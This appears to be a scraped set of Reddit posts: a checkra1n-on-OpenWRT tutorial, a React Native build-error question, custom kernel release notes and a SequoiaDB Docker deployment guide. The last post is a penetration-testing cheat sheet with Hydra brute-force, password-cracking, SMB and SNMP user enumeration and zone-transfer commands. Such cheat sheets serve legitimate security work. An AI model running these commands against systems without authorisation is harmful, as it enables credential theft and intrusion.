
[Tutorial] Run Checkra1n on any OpenWRT & Checkra1n compatible router (not just Linksys)

*Don't try this on a main router because you could permanently brick the router. Read through this entire post before starting and only attempt this if you're familiar with Terminal and you know what you're doing.*
If you saw this post but don't have a Linksys router, you might still be in luck.



  1. Search for your router on the OpenWRT website and open the page for your router. On the page, look for the "Installation" heading, and download the "Firmware OpenWRT Install" for your router model.
  2. Download the appropriate Checkra1n binary from the Checkra1n website.
  3. Connect your computer to your router via ethernet and power on the router. You'll need the router's IP address; if you don't know it, check your computer's network settings for the default gateway. Visit that IP address in your browser, and if a web login is available, then you're good so far.
  4. Log in with your router username and password (if you've never changed the credentials, Google the default ones). After logging in, unplug any other cables from the router besides power and the ethernet cable connected to your computer. Look for a way to upload a custom firmware file, and upload the file you downloaded from OpenWRT. Upgrade to that firmware.
  5. Once that's done, visiting the router's IP (which is now, OpenWRT's default) will take you to the OpenWRT login page. Log in with the username "root" and leave the password field blank.
    1. (Optional) If you would like, you can perform a software reset from within OpenWRT's webpage to prevent filesystem corruption. After you do that, log back into the router.
  6. Change the router's password. This is required for SSH access.
    1. (Optional) Enable wireless connections on your router from Network > Wireless. If you need help, check out this. If you do this, you won't need the Ethernet cable anymore.
  7. SSH into the router. (If you're on Windows, enable the OpenSSH client first.) In CMD/Terminal, type ssh root@ When it asks for the password, use the router password.
  8. Look for a directory with at least 20 MB of free space. You can check by typing the command df. The free directory will most likely be /tmp. (Note that the /tmp directory is cleared every time the router powers on.) Once you find a directory, type exit to close the SSH connection.
  9. You should be back in CMD/Terminal. Type this command to transfer the Checkra1n file to the router: scp PATH/TO/CHECKRA1N/FILE root@
  10. You're almost done; now adjust permissions. SSH into the router again and type these commands: cd PATH/TO/FREE/DIRECTORY, then chmod 777 checkra1n
  11. Connect your iDevice via USB and put it in iTunes Recovery Mode. Then type ./checkra1n -c -v
  12. Put the device into DFU Mode, and hopefully it boots jailbroken. (If you see errors, press CTRL+C to stop checkra1n and type ./checkra1n -c -v again; reliability is poor.)
If you do use the /tmp directory, repeat steps 9-12 every time you power on your router.
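The free-space hunt in step 8 can be scripted once you're in the SSH session; here's a sketch assuming a POSIX-style df -k (BusyBox's df on OpenWRT prints the same columns), with the 20 MB threshold from the step above:

```shell
# Print mount points with at least 20 MB (20480 KiB) available.
# Run this inside the SSH session on the router; df -k reports KiB,
# column 4 is "Available" and column 6 is "Mounted on".
candidates=$(df -k | awk 'NR > 1 && $4 >= 20480 { print $6 }')
echo "$candidates"
```

On most routers this will print /tmp, matching the note above about it being cleared on reboot.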
submitted by WishingTie09120 to jailbreak [link] [comments]

Android build failed when using react native CLI - Resource linking failed: ZipArchive didn't find signature at start of LFH, Invalid APK offset

Hey friends, I've been trying to get my environment set up to develop React Native apps on my Linux machine but I couldn't figure out how to fix this error when I start to run it on my Android device/emulator.
I'm fairly new to React Native and this is my first time trying the React Native CLI instead of using Expo so any help would be very much appreciated.
It fails on Task :app:processDebugResources when 'installing the app' (after running npx react-native run-android), with this error message:
FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':app:processDebugResources'.
> A failure occurred while executing$ActionFacade
   > Android resource linking failed
     AAPT: W/ziparchive(68779): Zip: didn't find signature at start of lfh, offset=33511520
     error: failed to open APK: Invalid offset.

* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

* Get more help at

BUILD FAILED in 1s

error Failed to install the app. Make sure you have the Android development environment set up:
Run CLI with --verbose flag for more details.
Error: Command failed: ./gradlew app:installDebug -PreactNativeDevServerPort=8081
FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':app:processDebugResources'.
> A failure occurred while executing$ActionFacade
   > Android resource linking failed
     AAPT: W/ziparchive(68779): Zip: didn't find signature at start of lfh, offset=33511520
     error: failed to open APK: Invalid offset.

* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

* Get more help at

BUILD FAILED in 1s
    at makeError (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/execa/index.js:174:9)
    at /home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/execa/index.js:278:16
    at processTicksAndRejections (internal/process/task_queues.js:97:5)
    at async runOnAllDevices (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/@react-native-community/cli-platform-android/build/commands/runAndroid/runOnAllDevices.js:94:5)
    at async Command.handleAction (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/@react-native-community/cli/build/index.js:186:9)
where the ziparchive(XXXXX) numbers change each time. Please let me know if further output would help (i.e. with stacktrace or info flags).
For context, I've been following the React Native CLI Quickstart guide for Linux as the development OS and Android as the target OS. The distribution I'm using is Manjaro Linux with KDE Plasma on a Dell XPS 13 9360. The issue starts at the "Running your React Native application" section when running npx react-native run-android after starting the metro bundler (npx react-native start).
I believe it has to do with my environment and not the code, as I am using the starter template when initializing the project and it builds fine when I tested it on a cloud build service.
Here is my system information when I run npx react-native info:
System:
  OS: Linux 4.19 Manjaro Linux
  CPU: (8) x64 Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz
  Memory: 2.70 GB / 7.52 GB
  Shell: 5.0.16 - /bin/bash
Binaries:
  Node: 13.8.0 - ~/.nvm/versions/node/v13.8.0/bin/node
  Yarn: 1.22.4 - /usr/bin/yarn
  npm: 6.13.6 - ~/.nvm/versions/node/v13.8.0/bin/npm
  Watchman: 4.9.0 - /usr/bin/watchman
SDKs:
  Android SDK: Not Found
IDEs:
  Android Studio: 3.6 AI-192.7142.36.36.6308749
Languages:
  Java: 1.8.0_242 - /usr/bin/javac
  Python: 3.8.2 - /usr/bin/python
npmPackages:
  @react-native-community/cli: Not Found
  react: 16.11.0 => 16.11.0
  react-native: 0.62.1 => 0.62.1
npmGlobalPackages:
  *react-native*: Not Found
What worries me is that the above shows Android SDK: Not Found, but I see Android SDK Platform 28 when I go to Settings > Android SDK in Android Studio, and the corresponding folder exists in my Android home. The same goes for the Intel x86 Atom_64 system image.
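One hypothetical culprit worth ruling out (since react-native info discovers the SDK through environment variables): missing ANDROID_HOME exports. The quickstart guide has you add something like the lines below; $HOME/Android/Sdk is only the common default install path and may differ on your machine:

```shell
# Exports recommended by the React Native quickstart; adjust the SDK path
# if Android Studio installed it elsewhere.
export ANDROID_HOME="$HOME/Android/Sdk"
export PATH="$PATH:$ANDROID_HOME/emulator:$ANDROID_HOME/platform-tools"
echo "ANDROID_HOME=$ANDROID_HOME"
```

If react-native info still reports Android SDK: Not Found after adding these to your shell profile and opening a new terminal, the problem is likely elsewhere.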
I went through and tried the suggestions I could find, but unfortunately none of them worked for me.
I also found two forum threads with seemingly identical errors; however, neither of them was resolved.
Interestingly, I found an article explaining what the error may mean.
My understanding from that is that an incompatible Gradle version may be causing the issue.
My android/gradle/ has distributionUrl=https\:// and Android Studio's File > Project Structure > Project has Gradle Version set to 6.0.1.
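For comparing the two versions quickly, the wrapper version can be read straight from the properties file; a sketch assuming the standard wrapper location (android/gradle/wrapper/gradle-wrapper.properties):

```shell
# Print the Gradle wrapper's distributionUrl, if the project uses the
# standard wrapper layout; otherwise say where we looked.
f=android/gradle/wrapper/gradle-wrapper.properties
if [ -f "$f" ]; then
  grep distributionUrl "$f"
else
  echo "no wrapper properties at $f"
fi
```

The version embedded in that URL should match (or at least be compatible with) the Gradle version Android Studio reports.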
Any insights? Any and all help is very much appreciated. Thanks!
submitted by stinkboye to reactnative [link] [comments]

v3 beta-R4 for Android 5.1.0 flo + deb

The new kernel release has been in test mode for 14 days (April 27 - May 11). 14 users participated in testing. During this time, this thread was set to non-public mode. All comments that were exchanged are attached below. To make the most sense of this info, read the comments bottom-up (chronological order), starting with "Initial release April 27 2015".
May 11, 2015 - Today I handed out install images to another 16 users and made this thread accessible to all users. Now 30 people in total are using this kernel on Android 5.1.0.
May 12, 2015 - Handed out 12 copies on request and 20 copies to old users and previous testers. 62 copies now delivered in total.
To request your kernel install images for 5.1.0, please send an email with subject "request v3 beta-R4". You will find the two install images within 24 hrs (or so) in your personal folder. Please report your findings below. Thank you.
Safety exception: in the first week (until May 18), I will NOT deliver the new kernel to very new users (who have joined April 10 or after). (removed May 13.)
May 14, 2015 - Uploaded installers for all "deb" users.
May 18, 2015 - Uploaded installers for all "flo" users.
May 22, 2015 - 180+ users have downloaded R4 build 61 since April 27.
Installation procedure is same as it ever was: after installing the target 5.1.0 Android release via factory image ("LMY47O"), you install a custom recovery (TWRP) via fastboot/bootloader. For this, your bootloader needs to be unlocked. You will then be able to install three files via recovery:
This is all you need to do.
Before you start upgrading, you should make a full backup of your current system in recovery. I strongly suggest you create your backup onto an external USB flash drive. TWRP can do this and it can also quickly and reliably restore from such a backup image. Please make use of this.
The new features are listed below (under "build 57").
v3 beta-R4 build 61:
v3 beta-R4 build 58:
v3 beta-R4 build 57:
Android 5.1.0 improvements over 5.0.x:
Easycap drivers - old and new:
You need to edit your file (once) to tell the system which Easycap drivers to load. This way you can switch between the old and the new drivers.
To create for the old (legacy), single-file easycap driver:
echo "insmod /system/vendor/easycap.ko" > /data/local/
chmod 777 /data/local/
To create for the new easycap stk1160 driver:
echo "insmod /system/vendor/stk1160.ko" > /data/local/
chmod 777 /data/local/
The new EasyCap drivers support faster device initialization (cold start). However, the new EasyCap stk1160 driver does NOT seem to work with all stk1160-based devices.
The Sabrent Easycap and USBTV Easycap devices do NOT appear to be working well with the new drivers made available via this kernel release. You should consider getting a STK1160 based frame grabber device to use with this release. See my USBTV related remarks.
The new EasyCap drivers are using a different video pixel encoding compared to the old/legacy driver. As a result, when using the new drivers, you need to change the default video encoding in VCam from YUYV to UYVY (once).
On first run, VCam will start up in PAL mode. If you are using a NTSC camera, you will need to switch VCam from PAL to NTSC (once).
Read: Automatic rear camera: 3 options
On-power CPU Governor:
This setting allows you to select different power saving modes (aka CPU underclocking).
The ability to switch CPU modes is a standard Linux kernel feature.
Here you can find more detailed CPU Governor info.
If you don't care for underclocking, just leave the default "interactive" setting selected. Most people may not need to change this ever.
I make this functionality available because what looks like a reliable, fixed power line to the tablet may not be so constant and reliable if you are using your tablet in the car (or something similar). Stock Android's assumption that you want to run interactive mode just because external power is available may be wrong.
I am myself using "ondemand" mode for now and I really don't feel much of a difference. However, I assume the CPUs run a little cooler overall, and I expect the 3D-navigation app that I run for hours to use a little less power overall, etc.
The "powersave" setting will not be of much interest to most people. It may be useful on some very hot days, I don't know. This is something some people may want to try. But probably not.
The Nexus 7 kernel does not support "conservative" mode. This may be a Snapdragon thing; I'm not sure. I know that other Android chipsets do support "conservative" mode.
"Performance" is also not supported - at all. This setting only makes sense on servers. But I'm not even sure about this.
It's called "On power CPU Governor" because the setting only affects the CPU mode when external power is attached. Battery-driven mode is not influenced by this setting; on battery power, the tablet behaves 100% stock.
Btw, my desktop PC is practically always running in "ondemand" mode.
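For the curious, the governor is exposed through the standard Linux cpufreq sysfs interface; a quick sketch you can run in any shell (the paths are the stock locations and may be absent on kernels built without cpufreq):

```shell
# Inspect the cpufreq governor via the standard sysfs paths; the fallback
# branch covers kernels that don't expose cpufreq.
gov_dir=/sys/devices/system/cpu/cpu0/cpufreq
if [ -r "$gov_dir/scaling_governor" ]; then
  echo "available: $(cat "$gov_dir/scaling_available_governors")"
  echo "current:   $(cat "$gov_dir/scaling_governor")"
  # Switching (as root) is a plain write, e.g.:
  #   echo ondemand > "$gov_dir/scaling_governor"
else
  echo "cpufreq sysfs not exposed on this kernel"
fi
```

The kernel's on-power setting described above is doing essentially this write for you whenever external power is attached.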
Previous v3 features
Users who are upgrading from v2.0/4.4.4 straight to v3/5.1.0 should at least take a brief look at the top messages of previous v3 releases: v3 beta-R1, v3 beta-R2 and v3 beta-R3.
submitted by timur-m to timurskernel [link] [comments]

How to implement rapid deployment of SequoiaDB cluster with Docker

Container technology, represented by Docker and Rocket, is becoming more and more popular. It is changing the way companies and users create, publish, and use distributed applications, and it will bring value to the cloud computing industry over the next five years. The reasons for its appeal are as follows:

1)Resource Independence and Isolation

Resource isolation is the most basic requirement of cloud computing platforms. Docker limits hardware resources and the software running environment through Linux namespaces and cgroups, isolating each application from the others on the host machine so they do not affect each other.

Different applications and services are "shipped" and "unshipped" in units of containers. Thousands of "containers" are arranged on the "container ship", and different companies' different kinds of "goods" (programs, components, operating environments, dependencies required to run applications) remain independent of each other.

2) Environmental Consistency

After finishing application development, the engineer builds a Docker image. Based on this image, the container is packed with all of its "goods" (programs, components, operating environment, dependencies required to run the application). No matter where the container runs (development, test, or production environment) its contents are exactly the same: no software package goes missing in the test environment, no environment variable is forgotten in production, and the application does not break because development and production installed different versions of a dependency. This consistency comes from the fact that everything is sealed into the "container" at build time, and every step in delivery transports this complete container without splitting and merging.

3) Lightweight

Compared to traditional virtualization technology (VMs), Docker's performance loss on CPU, memory, disk I/O, and network I/O is on the same level or even better. The rapid creation, start-up, and destruction of containers has also received a lot of praise.

4)Build Once, Run Everywhere

This feature has attracted many people. When "goods" (applications) move between "trucks", "trains", and "ships" (private clouds, public clouds, etc.), only the "docker container" conforming to standard specifications and handling needs to migrate. This eliminates the time-consuming and labor-intensive manual "loading and unloading" (bringing applications online and offline), resulting in huge time and labor savings. In the future this may let just a few operators run container clusters serving ultra-large-scale online applications, just as a few crane operators in the 1960s could unload a 10,000-container ship in a few hours.

Container technology is now widely used in the database field as well. Its "Build Once, Run Everywhere" feature greatly reduces the time spent installing and configuring a database environment, because even for DBAs who have worked with databases for many years, setting up a database environment is a seemingly simple but often complex task. Of course, the other advantages of container technology also apply well to databases.

As an excellent domestic distributed NewSQL database, SequoiaDB has been recognized by more and more users. This article takes Docker as an example, focusing on how to quickly build a SequoiaDB image with a Dockerfile, and how to use containers to quickly build and start a SequoiaDB cluster for an application system.

Build SequoiaDB image

How to install Docker and configure repositories is not the focus of this article; there are many related technical articles on the Internet. It should be pointed out that this article uses the Aliyun Repository, because the speed of uploading images to the official Docker repository is unflattering. How to register and use the Aliyun Repository is covered in a separate article.

STEP 1: Create a Dockerfile using the following statements:
# Sequoiadb DOCKERFILES PROJECT
# --------------------------
# This is the Dockerfile for Sequoiadb 2.8.4
#
# REQUIRED FILES TO BUILD THIS IMAGE
# ----------------------------------
# (1)
# (2)
#
# HOW TO BUILD THIS IMAGE
# -----------------------
# Put all downloaded files in the same directory as this Dockerfile
# Run:
#   $ sudo docker build -t sequoiadb:2.8.4 .
#
# Pull base image
FROM ubuntu

# Environment variables required for this build
ENV INSTALL_BIN_FILE="" \
    INSTALL_SDB_SCRIPT="" \
    INSTALL_DIR="/opt/sequoiadb"

# Copy binaries
ADD $INSTALL_BIN_FILE $INSTALL_SDB_SCRIPT $INSTALL_DIR/

# Install SDB software binaries
RUN chmod 755 $INSTALL_DIR/$INSTALL_SDB_SCRIPT \
    && $INSTALL_DIR/$INSTALL_SDB_SCRIPT \
    && rm $INSTALL_DIR/$INSTALL_SDB_SCRIPT
The content of the install script is as follows:
chmod 755 $INSTALL_DIR/$INSTALL_BIN_FILE
$INSTALL_DIR/$INSTALL_BIN_FILE --mode unattended
rm $INSTALL_DIR/$INSTALL_BIN_FILE
echo 'service sdbcm start' >> /root/.bashrc
It should to be noted that this example uses SequoiaDB Enterprise Edition 2.8.4. You can also download the community version from the official website of SequoiaDB (select tar package, download and extract), and replace the media name in this example. SequoiaDB website download address:

STEP 2: Create an image
The root user executes:
docker build -t sequoiadb:2.8.4 .
If you are a normal user, use sudo:
sudo docker build -t sequoiadb:2.8.4 .

STEP3: Login to Aliyun Repository
docker login
(xxx is the account you registered with Alibaba Cloud.)

STEP4: View local SequoiaDB image id
docker images

STEP5: Mark local image and put it into Aliyun Repository
04dc528f2a6f is the author's local sequoiadb image id, the target prefix is the Aliyun Repository address, 508mars is the author's name in Aliyun, sequoiadb is the image name, and latest is the tag.

Start SequoiaDB cluster with container

Docker’s network defaults to bridge mode, and containers in bridge mode have the following characteristics:
1) Containers on the same host can ping each other
2) Containers on different hosts cannot ping each other

However, the SequoiaDB cluster requires interoperability between all nodes, so if the containers running SequoiaDB sit on different hosts, Docker's default network mode is obviously inappropriate. There are many ways to solve connectivity between containers on different hosts; this article only introduces the weave virtual network solution, because weave also provides a DNS server. With that, deploying SequoiaDB clusters in containers no longer requires modifying /etc/hosts inside each container, which greatly simplifies automated deployment.

STEP1: Install the weave network
curl -s -L -o /usr/local/bin/weave
chmod a+x /usr/local/bin/weave
It needs to be installed on all hosts; the author uses three virtual machines as hosts: sdb1, sdb2, and sdb3.

STEP2: Start the weave network
weave launch
The weave image will be downloaded the first time it is started.

STEP3: Download the SequoiaDB image from Aliyun Repository
docker pull

STEP4: Create a docker mounted volume on all hosts
cd /home/sdbadmin
mkdir -p data/disk1 data/disk2 data/disk3
mkdir -p conf/local
chmod -R 777 data
chmod -R 777 conf
The location of the mounted volumes can be customized, but in general you need two kinds: one for storing collection data, such as data/disk1, data/disk2, data/disk3, and so on; the other for node configuration information, such as conf/local in this example. That way, even if a container is deleted by mistake, you can start a new container to take over the role of the one that was accidentally deleted.
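The host-side layout above can be scripted; here's a sketch with a configurable base directory (BASE defaults to a temp dir so the sketch is safe to run anywhere; the article itself uses /home/sdbadmin):

```shell
# Create the two kinds of volumes from step 4: data disks for collection
# data and conf/local for node configuration.
BASE="${BASE:-$(mktemp -d)}"
mkdir -p "$BASE"/data/disk1 "$BASE"/data/disk2 "$BASE"/data/disk3
mkdir -p "$BASE"/conf/local
chmod -R 777 "$BASE"/data "$BASE"/conf
ls "$BASE"
```

Run it on each of the three hosts before starting the containers.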

STEP5: Start the container
sdb1:
weave stop
weave launch
eval $(weave env)
docker run -dit --name sdbserver1 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local

sdb2:
weave stop
weave launch
eval $(weave env)
docker run -dit --name sdbserver2 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local

sdb3:
weave stop
weave launch
eval $(weave env)
docker run -dit --name sdbserver3 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local

The IP address used is sdb1's, and 11810 is the externally exposed cluster access port. The volume on the host that stores node configuration information must be mounted at /opt/sequoiadb/conf/local in the container. The volume that holds table data can be mounted at a user-defined directory; however, once the cluster is created, it cannot be changed. The machine name must be specified when starting the container, because after the cluster is built the machine name is saved in SequoiaDB's system tables; if a node's machine name is inconsistent with the system table, it will not be added to the cluster. When using weave, it is recommended to set the machine name with the --name option and not with --hostname: the latter prevents weave from adding the machine name to its DNS server, whereas weave automatically derives the machine name from the value of --name, appends the weave.local domain to it, and registers it in the DNS server.

STEP6: Copy the script that creates the SequoiaDB cluster into the container:
docker cp create_cluster.js sdbserver1:/data
The content of create_cluster.js is as follows:
var array_hosts = ["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"];
var array_dbroot = ["/data/disk1/sequoiadb/database", "/data/disk2/sequoiadb/database", "/data/disk3/sequoiadb/database"];
var port_sdbcm = "11790";
var port_temp_coord = "18888";
var cataloggroup = {gname:"SYSCatalogGroup", gport:"11820", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]};
var array_coordgroups = [
  {gname:"SYSCoord", gport:"11810", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]}
];
var array_datagroups = [
   {gname:"dg1", gport:"11830", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
  ,{gname:"dg2", gport:"11840", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
  ,{gname:"dg3", gport:"11850", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}}
];
var array_domains = [
  {dname:"allgroups", dgroups:["dg1", "dg2", "dg3"], doptions:{AutoSplit:true}}
];

println("Start the temporary coord node");
var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm);
oma.createCoord(port_temp_coord, array_dbroot[0]+"/coord/"+port_temp_coord);
oma.startNode(port_temp_coord);

println("Create catalog group: "+cataloggroup.ghosts[0]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport);
var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord);
db.createCataRG(cataloggroup.ghosts[0], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport);
var cataRG = db.getRG("SYSCatalogGroup");
for (var i in cataloggroup.ghosts) {
  if (i==0) {continue;}
  println("Create catalog node: "+cataloggroup.ghosts[i]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport);
  var catanode = cataRG.createNode(cataloggroup.ghosts[i], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport);
  catanode.start();
}
println("Create coord group");
var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord);
var coordRG = db.createCoordRG();
for (var i in array_coordgroups) {
  for (var j in array_coordgroups[i].ghosts) {
    println("Create coord node: "+array_coordgroups[i].ghosts[j]+" "+array_coordgroups[i].gport+" "+array_dbroot[0]+"/coord/"+array_coordgroups[i].gport);
    coordRG.createNode(array_coordgroups[i].ghosts[j], array_coordgroups[i].gport, array_dbroot[0]+"/coord/"+array_coordgroups[i].gport);
  }
}
coordRG.start();

println("Remove the temporary coord node");
var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm);
oma.removeCoord(port_temp_coord);

println("Create data groups");
var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport);
var k=0;
for (var i in array_datagroups) {
  var dataRG = db.createRG(array_datagroups[i].gname);
  for (var j in array_datagroups[i].ghosts) {
    println("Create data node: "+array_datagroups[i].gname+" "+array_datagroups[i].ghosts[j]+" "+array_datagroups[i].gport+" "+array_dbroot[k]+"/data/"+array_datagroups[i].gport+" "+array_datagroups[i].goptions);
    dataRG.createNode(array_datagroups[i].ghosts[j], array_datagroups[i].gport, array_dbroot[k]+"/data/"+array_datagroups[i].gport, array_datagroups[i].goptions);
  }
  dataRG.start();
  k++;
}

println("Create domains");
var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport);
for (var i in array_domains) {
  println("Create domain: "+array_domains[i].dname+" "+array_domains[i].dgroups+" "+array_domains[i].doptions);
  db.createDomain(array_domains[i].dname, array_domains[i].dgroups, array_domains[i].doptions);
}
STEP7: Run the script inside the container to create the cluster:
docker exec sdbserver1 su - sdbadmin -c "sdb -f /data/create_cluster.js"



SequoiaDB uses container technology to achieve rapid cluster deployment, which greatly simplifies installation and deployment for beginners. Later, the author will also optimize the SequoiaDB image build, because the image currently produced is a bit large. The main reason: copying the installation media into the image with ADD or COPY creates a new layer (image1); even though a later layer (image2) deletes the media, image2 sits on top of image1, so the final image still contains the media's size. Thus, it is best to ADD a tar package (ADD decompresses automatically) or download and build within a single RUN, as follows:
RUN mkdir -p /usr/src/things \
  && curl -SL \
  | tar -xJC /usr/src/things \
  && make -C /usr/src/things all
submitted by sequoiadb to u/sequoiadb [link] [comments]

noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p- -A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

SMB enumeration

ls /usr/share/nmap/scripts/* | grep ftp - Search nmap scripts for keywords
nbtscan - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing


nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off inverse name lookup, for when resolution hangs
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site


Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc
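On current systems the Python 2 SimpleHTTPServer module is replaced by Python 3's http.server; a quick sketch that serves a scratch directory, fetches a file, and shuts down (port 8031 is arbitrary):

```shell
# Serve a temp dir in the background, fetch a file, then stop the server.
dir=$(mktemp -d)
cd "$dir"
echo hello > index.html
python3 -m http.server 8031 >/dev/null 2>&1 &
srv=$!
sleep 1
body=$(curl -s http://127.0.0.1:8031/index.html)
kill "$srv"
echo "$body"
```

In practice you'd just run `python3 -m http.server 80` from the directory holding your shells, same as the Python 2 one-liner above.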

Mounting File Shares

mount /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs; if you remove password it will prompt on the CLI (more secure, as it won't end up in bash_history)
net use Z: \win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 25 / telnet 25 - Basic versioning / fingerprinting via the displayed banner

SNMP Enumeration

snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d - Windows DNS zone transfer
dig axfr - Linux DNS zone transfer


dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

HTTP / HTTPS Webserver Enumeration

nikto -h - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usr/share/doc/python-impacket-doc/examples/ 192.168.XXX.XXX - Enumerate users from SMB
192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk public -v1 192.168.X.XXX 1 | grep | cut -d" " -f4 - Enumerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/ SNMP 192.168.X.XXX - Enumerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output


/usr/share/wordlists - Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force

Password Cracking

John The Ripper - JTR
john --wordlist=/usr/share/wordlists/rockyou.txt hashes - JTR password cracking
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show - JTR forced descrypt brute force cracking

Exploit Research

searchsploit windows 2003 | grep -i local - Search exploit-db for exploits, in this example Windows 2003 + local escalation exploits
site:exploit-db.com exploit kernel <= 3 - Use Google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/* - Search metasploit modules using grep - msf search sucks a bit

Linux Penetration Testing Commands

Linux Network Commands

netstat -tulpn - Show Linux network ports with process ID's (PIDs)
watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.
lsof -i - Show established connections.
macchanger -m MACADDR INTR - Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 - Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 - Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.X - Dig reverse lookup on an IP address.
host 192.168.1.X - Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 -t AXFR blah.com - Perform a DNS zone transfer using dig.
host -l blah.com nameserver - Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x - Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com - Blocks access to google.com from the host machine.
echo "1" > /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
echo "nameserver" > /etc/resolv.conf - Use Google DNS.

System Information Commands

Useful for local enumeration.

whoami - Shows currently logged in user on Linux.
id - Shows currently logged in user and groups for the user.
last - Shows last logged in users.
mount - Show mounted drives.
df -h - Shows disk usage in human readable output.
echo "user:passwd" | chpasswd - Reset password in one line.
getent passwd - List users on Linux.
strings /usr/local/bin/blah - Shows contents of non-text files, e.g. what's in a binary.
uname -ar - Shows running kernel version.
PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.
